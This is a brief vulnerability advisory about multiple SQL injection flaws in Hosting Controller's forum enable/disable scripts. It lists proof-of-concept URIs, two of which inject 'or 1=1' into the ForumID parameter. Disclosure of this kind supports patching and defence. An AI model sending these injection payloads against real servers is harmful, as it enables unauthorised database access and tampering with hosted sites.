Hosting Controller Multiple SQL Injection Vulnerabilities

Hosting Controller Multiple SQL Injection Vulnerabilities

An attacker can exploit these issues via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1 or 1=1
http://www.example.com/forum/HCSpecific/EnableForum.asp?action=enableforum&ForumID=1 or 1=1
http://www.example.com/forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testsite.com&VDirName=test&Forum ID=1
http://www.example.com/forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testsite.com&VDirName=test&ForumID=